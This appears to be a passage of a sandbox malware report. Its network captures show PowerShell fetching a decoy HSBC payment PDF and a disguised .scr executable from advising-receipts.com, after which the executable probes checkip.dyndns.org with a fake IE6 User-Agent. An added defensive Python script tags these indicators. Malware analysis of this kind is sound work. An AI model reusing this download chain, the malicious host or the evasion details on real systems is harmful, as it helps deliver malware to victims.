Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49730 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:30.957253933 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
May 1, 2024 15:17:31.052700996 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49732 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:31.603873968 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
May 1, 2024 15:17:31.698998928 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49734 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:32.253535032 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
May 1, 2024 15:17:32.348392963 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49736 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:34.000605106 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
May 1, 2024 15:17:34.095657110 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49738 | 193.122.130.0 | 80 | 8336 | C:\Windows\Temp\hadvices.scr
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 15:17:34.662223101 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
May 1, 2024 15:17:34.757692099 CEST | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 172.67.141.195 | 443 | 4912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:07 UTC | 189 | OUT | GET /hsbc/Payment_Advice.pdf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: advising-receipts.com
Connection: Keep-Alive
2024-05-01 13:17:07 UTC | 644 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:07 GMT
Content-Type: application/pdf
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Last-Modified: Wed, 01 May 2024 13:17:07 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca1UGuXJQAmIqtePQ2kepeZdgB9%2BwbNXgBYjjrDKHT7eann3djqqpViz4La8iWAFsWp2AFmxH3tA3hjWi5HG3jRjCZWdjmlG%2FiP59ZxxxFYjcdfoy6CXVnRFVoTEtWIjERJUDukyrQA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d00cc939a65a27-IAD
alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:07 UTC | 725 | IN | Data Raw: 33 38 66 66 0d 0a 25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 50 61 67 65 0d 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 32 20 5d 0d 0a 2f 52 65 73 6f 75 72 63 65 73 20 3c 3c 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 58 30 20 33 20 30 20 52 20 3e 3e 20 3e 3e 0d 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 0d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0d 0a 2f 52 6f 74 61 74 65 20 33 36 30 0d 0a 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0d 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0d 0a 2f 57 69 64 74 68 20 32 34 38 30 0d 0a 2f 48 65 69 67 68 74 20 33 35 30 39 0d 0a 2f 42 69 74 73 50
Data Ascii: 38ff%PDF-1.4%1 0 obj<</Type /Page/MediaBox [ 0 0 595 842 ]/Resources << /XObject << /X0 3 0 R >> >>/Contents 4 0 R/Parent 2 0 R/Rotate 360>>endobj3 0 obj<</Type /XObject/Subtype /Image/Width 2480/Height 3509/BitsP
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fd fc a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28
Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?((((((((
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00
Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 82 c9 7e d5 5f b7 97 c3 c8 3c 61 e0 7f d8 96 1b 6f 08 5f f3 67 ac eb df 14 23 d3 6d ef 87 4f dc 24 9a 7f 9b 22 1f f9 e9 1c 7e 5f 5e 68 03 f4 f2 8a f2 df d9 9b c7 5f 12 be 23 78 06 ea f3 e2 8f 80 74 6f 86 de 22 86 fd e2 87 4a d3 7c 49 ff 00 09 04 72 db 88 e3 29 71 f6 8f 22 df 04 b9 90 6c f2 f8 f2 c7 26 bd 4a 80 0a 2b c9 7f 6a 5f 7c 56 f8 77 e1 1d 32 eb e1 4f c3 7d 0f e2 56 b1 2d e7 97 79 63 aa f8 b3 fe 11 d8 ed 61 f2 db f7 82 4f b3 dc 79 9f 3e c1 b3 03 83 d6 be 12 fd b8 3f e0 b6 9f b5 17 fc 13 e3 c1 0b e2 8f 88 5f b1 4c 27 c2 71 ca 23 9f 5c d1 7e 27 c5 a9 59 db b1 ed 37 97 a7 f9 90 7f d7 49 23 08 4e 00 cd 00 7e a3 d1 5f cf cf fc 47 1d 75 ff 00 46 cb 6b ff 00 87 0c ff 00 f2 ba ba 8f 83 df f0 79 4f 8c 3e 3e fc 45 d2 bc 23 e0 9f d9 1e f3 c4 de 24 d6 a6 f2
Data Ascii: ~_<ao_g#mO$"~_^h_#xto"J|Ir)q"l&J+j_|Vw2O}V-ycaOy>?_L'q#\~'Y7I#N~_GuFkyO>>E#$
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 1f f4 54 24 ff 00 c1 06 9b ff 00 c6 28 ff 00 87 db fe d3 ff 00 f4 54 64 ff 00 c1 06 9b ff 00 c6 2b 9f fe 22 26 59 fc b3 fb 97 f9 9e e7 fc 49 a7 1c 7f cf dc 3f fe 0c 9f ff 00 2b 3f a1 bd df ed 7e 94 6e ff 00 6b f4 af e7 93 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 22 26 59 fc b3 fb 97 f9 8f fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 7b bf da fd 29 37 7f b5 fa 57 f3 cb ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 11 13 2c fe 59 fd cb fc c3 fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 58 ff 00 69 7f 2a 00 c1 fb c3 f2 af e7 8f fe 1f 63 fb 4f 1f f9 aa 12 7f e0 83 4d ff 00 e3 15 63 4f ff 00 82 ce fe d4 7a
Data Ascii: T$(Td+"&YI?+?~nkoOQooOQo"&Y$??VC{)7W7Q7Q,Y$??VCXi*cOMcOz
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 3a f5 9d a7 87 23 75 ff 00 9e 77 b7 91 5b dc 0f fc 06 79 e8 03 f9 de ff 00 82 e0 7f c1 65 fc 59 ff 00 05 55 fd a3 75 26 b4 be bc d3 fe 10 f8 5e ea 48 fc 27 a1 ee f2 e3 91 3f d5 ff 00 68 5c 27 f1 dc ca 37 7f d7 28 df cb 1f f2 d0 c9 ef df f0 40 af f8 37 30 ff 00 c1 45 fc 37 0f c5 af 8b 57 da 96 83 f0 95 6e de 0d 33 4e b2 60 97 be 2b 78 a4 d9 27 ef 71 fb 9b 61 26 63 2f fe b2 43 e6 04 31 ec 12 57 e4 8d 7f 6f 3f f0 4a ef 0d e8 de 16 ff 00 82 6b fc 01 b4 f0 ff 00 97 fd 8f 1f c3 ed 12 48 1d 17 fd 6f 99 65 14 8f 27 fd b4 77 2f f5 34 01 7f f6 71 ff 00 82 71 7c 07 fd 92 f4 3b 7d 3b e1 ef c2 5f 01 f8 69 6d 53 cb fb 4c 1a 44 72 de ca 0f fc f4 b8 90 3d c4 9f f6 d2 43 5d 77 c5 df d9 5f e1 9f ed 01 e1 f6 d2 7c 71 f0 f7 c1 3e 2c d3 64 5d 82 df 56 d1 2d ef 11 47 5f e3 8c
Data Ascii: :#uw[yeYUu&^H'?h\'7(@70E7Wn3N`+x'qa&c/C1Wo?JkHoe'w/4qq|;};_imSLDr=C]w_|q>,d]V-G_
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 1f 83 93 f8 3d bc 59 e1 7d 4b 51 30 fd 9e 2f 12 5f 68 11 cb ad 5a 8e 99 07 3f 67 79 38 fb f2 c3 27 e7 5f a8 1f f0 66 8f c4 1d 4b c6 ff 00 b1 0f c6 09 b5 6b eb ad 4b 52 ba f8 97 71 aa dd 5c 5d 48 65 92 e2 7b 8d 3e cb cc 91 e4 3f 7d dc a6 79 fa f7 af 33 ff 00 83 a3 7f e0 84 9a 57 89 bc 13 af 7e d3 5f 09 34 58 74 cd 6b 45 8d ef fc 79 a3 da c7 e5 c3 aa db e3 32 6a b1 a0 e9 71 1f 2f 71 ff 00 3d 23 fd e7 12 47 21 97 5b fe 0c 89 d6 7e d5 fb 35 7c 74 b1 ff 00 9f 5f 13 69 f3 ff 00 df cb 69 07 fe d3 a0 0f dc 4a 28 a2 80 0a 0d 19 a0 9e 28 02 bc 92 73 db 76 38 1e 94 d4 7f 31 47 dd 61 dc e2 87 40 fd b0 18 72 7d ab f3 8f fe 0a fb ff 00 05 79 87 f6 7b b3 bf f8 6b f0 d6 f9 66 f1 c5 c2 18 f5 1d 4e 03 e6 47 a0 c7 fd c5 c7 59 cf a7 f0 75 35 c1 99 66 54 30 34 3d bd 73 ea f8
Data Ascii: =Y}KQ0/_hZ?gy8'_fKkKRq\]He{>?}y3W~_4XtkEy2jq/q=#G![~5|t_iiJ((sv81Ga@r}y{kfNGYu5fT04=s
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28
Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC | 1369 | IN | Data Raw: c6 12 40 1a f3 e2 87 8a 2f f5 21 2f fd 3b 5b 11 65 1a 7e 12 5b ce 7f ed a5 7e af d0 01 45 14 50 01 45 14 50 06 6e b3 a1 d9 f8 8f 4a b8 b1 bd b6 82 f2 ce f6 37 b7 9e 09 93 cc 8e 58 df ef a3 0e 98 3d 2b f2 7f fe 0d bf fd 9a 63 fd 89 7f 6d df db bb e1 04 2b 24 7a 6f 83 7c 57 a1 49 a6 24 9f eb 3e c1 73 1e a3 3d 9e 7e b6 c6 3a fd 72 af 32 f8 7d fb 2e f8 43 e1 8f ed 0f f1 0b e2 86 91 67 73 6f e2 ff 00 8a 70 e9 96 fa fc f2 5c 3c 91 dc 26 9f 1c 91 5b 62 33 c2 11 1c 8e 3f 2f a5 00 7a 6d 06 8a 0f 4a 00 af 24 9c f6 dd 8e 07 a5 35 1f 7a 8f ba c0 75 38 a1 90 4b fc 3f 2b 0e 4f b5 7e 73 ff 00 c1 5e 7f e0 af 50 fe ce f6 77 df 0d be 1a df 47 73 e3 85 31 ea 3a 84 47 cc 8b 40 8c ff 00 39 8f a7 f0 75 35 c1 99 66 54 30 34 3d bd 73 ea b8 27 82 73 5e 2a cd 69 e5 39 4c 39 e7
Data Ascii: @/!/;[e~[~EPEPnJ7X=+cm+$zo|WI$>s=~:r2}.Cgsop\<&[b3?/zmJ$5zu8K?+O~s^PwGs1:G@9u5fT04=s's^*i9L9


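The sessions in this network section fit a recognisable pattern: six near-identical GET / requests to checkip.dyndns.org from C:\Windows\Temp\hadvices.scr, all carrying an MSIE 6.0 / Windows NT 5.2 User-Agent although the same host's PowerShell announces Windows NT 10.0, preceded by PowerShell fetching a decoy Payment_Advice.pdf and then hadvices.scr from advising-receipts.com, the latter served as application/octet-stream with an MZ header directly after the chunk-size line. The script below is an added example, not part of the Joe Sandbox report or of the sample. The hosts, User-Agents, process paths and the byte prefixes are taken from the capture on this page; the tag names, the writable-directory list and the reference date are this example's own assumptions.

```python
"""Triage of the HTTP sessions in this report (added example, not Joe Sandbox code).

The sample records are CONSTRUCTED from the rows on this page: the
checkip.dyndns.org probes sent by C:\\Windows\\Temp\\hadvices.scr and the two
PowerShell downloads from advising-receipts.com. Tag names, the directory list
and the reference date are this example's own choices.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass
from datetime import datetime, timezone

# User-Agent strings exactly as captured above. The first claims MSIE 6.0 on
# Windows NT 5.2 while the same host's PowerShell announces Windows NT 10.0.
LEGACY_IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
POWERSHELL_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

IP_ECHO_HOSTS = {"checkip.dyndns.org"}                     # assumption: extend as needed
WRITABLE_DIRS = ("c:\\windows\\temp\\", "c:\\users\\")     # assumption: where droppers land
ANALYSIS_DATE = datetime(2024, 5, 1, tzinfo=timezone.utc)  # capture date from the report


@dataclass
class Session:
    process: str
    host: str
    user_agent: str
    request_line: str
    body: bytes = b""  # leading bytes of the response body, still chunk-encoded


def dechunk_first(body: bytes) -> tuple[int, bytes]:
    """Strip the chunk-size line of a 'Transfer-Encoding: chunked' body.

    Returns (declared size of the first chunk, payload bytes that follow it).
    In the dumps above this line is '38ff' for the PDF and '31ea' for the .scr.
    """
    line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise ValueError("no chunk-size line")
    size = int(line.split(b";", 1)[0].strip(), 16)  # drop chunk extensions
    return size, rest[:size]


def pe_header_info(data: bytes) -> dict | None:
    """Follow MZ -> e_lfanew -> 'PE\\0\\0' and return machine and link timestamp.

    Returns None when the bytes are not the start of a PE image (e.g. '%PDF').
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < e_lfanew + 12 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, _sections, stamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return {"machine": machine, "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc)}


def triage(s: Session, now: datetime = ANALYSIS_DATE) -> list[str]:
    """Return indicator tags for one session, in a fixed order."""
    tags: list[str] = []
    proc = s.process.lower()
    if s.host.lower() in IP_ECHO_HOSTS:
        tags.append("external-ip-check")
    if s.user_agent == LEGACY_IE6_UA:
        tags.append("legacy-ie6-ua")
    if proc.startswith(WRITABLE_DIRS) and proc.endswith((".scr", ".exe", ".dll")):
        tags.append("binary-in-writable-dir")
    if "WindowsPowerShell/" in s.user_agent and s.body:
        try:
            _, payload = dechunk_first(s.body)
        except ValueError:
            payload = s.body  # not chunked; inspect the raw body
        info = pe_header_info(payload)
        if info:
            tags.append("powershell-downloaded-pe")
            if info["timestamp"] > now:
                tags.append("pe-timestamp-in-future")
    return tags


# Response prefixes transcribed from the 'Data Raw' dumps on this page. SCR_BODY
# covers the chunk-size line, the 64-byte MZ header (e_lfanew = 0x80), the 64-byte
# DOS stub and the first 12 bytes of the PE header (machine 0x014c, stamp 0xdd330b0c).
SCR_BODY = (
    b"31ea\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32 + b"\x80\x00\x00\x00"
    + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    + b"This program cannot be run in DOS mode.\r\r\n$" + b"\x00" * 7
    + b"PE\x00\x00\x4c\x01\x03\x00\x0c\x0b\x33\xdd"
)
PDF_BODY = b"38ff\r\n%PDF-1.4\r\n%\xe2\xe3\xcf\xd3\r\n1 0 obj\r\n"

SESSIONS = [  # constructed from the session tables on this page
    Session(r"C:\Windows\Temp\hadvices.scr", "checkip.dyndns.org", LEGACY_IE6_UA, "GET / HTTP/1.1"),
    Session(POWERSHELL, "advising-receipts.com", POWERSHELL_UA, "GET /hsbc/Payment_Advice.pdf HTTP/1.1", PDF_BODY),
    Session(POWERSHELL, "advising-receipts.com", POWERSHELL_UA, "GET /hsbc/hadvices.scr HTTP/1.1", SCR_BODY),
]

if __name__ == "__main__":
    for s in SESSIONS:
        print(f"{s.process:<60} {s.host:<22} {s.request_line:<40} {triage(s)}")
```

Two details are worth noticing when running it. First, the "38ff" and "31ea" that open the two Data Ascii dumps are not file content but the hexadecimal chunk sizes of a chunked response (14591 and 12778 bytes), which is why dechunk_first is needed before looking at the payload. Second, the PE TimeDateStamp parsed from the hadvices.scr header (0xdd330b0c) decodes to a date in 2087, well after the capture date; that is the same observation the report's "Binary contains a suspicious time stamp" signature makes, reproduced here from the bytes on the wire.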
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 172.67.141.195 | 443 | 4912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 13:17:09 UTC | 159 | OUT | GET /hsbc/hadvices.scr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: advising-receipts.com
2024-05-01 13:17:09 UTC | 588 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 13:17:09 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFxKANaLQlaGvnKwYCL1YKljP6BEXt05ME%2Bg%2BDKUeF%2FemEYLpSrI31RHRcLfQaze0c3HgJPkuDj%2FO8QSQzevwIsdzEcyF3pEjXzsB9KImB9vFMOFq30%2FW4402FVWYweze%2BjE1WXb8rI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87d00cd5ac5238a6-IAD
alt-svc: h3=":443"; ma=86400
